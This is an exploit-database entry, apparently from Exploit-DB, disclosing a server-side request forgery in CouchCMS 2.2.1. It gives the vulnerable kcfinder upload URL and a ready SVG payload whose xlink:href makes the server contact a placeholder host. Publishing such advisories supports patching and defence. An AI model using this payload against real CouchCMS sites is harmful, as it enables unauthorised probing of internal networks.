CouchCMS 2.2.1 - SSRF via SVG file upload

vendor:

CouchCMS

by:

xxcdd

8.8

CVSS

HIGH

Server-Side Request Forgery (SSRF)

918

CWE

Product Name: CouchCMS

Affected Version From: 2.2.1

Affected Version To: 2.2.1

Patch Exists: YES

Related CWE: N/A

CPE: a:couchcms:couchcms

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7

2021

CouchCMS 2.2.1 – SSRF via SVG file upload

An issue was discovered in CouchCMS v2.2.1 that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload. The upload URL is /couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en and the SVG content contains an xlink:href attribute pointing to a malicious IP address.

Mitigation:

Upgrade to the latest version of CouchCMS.

Source

Exploit-DB raw data:

# Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7

An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload.

upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en

ssrf.svg content:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="
http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
width="200" height="200">
<image height="200" width="200" xlink:href="http://<test_ip>:1234" />
</svg>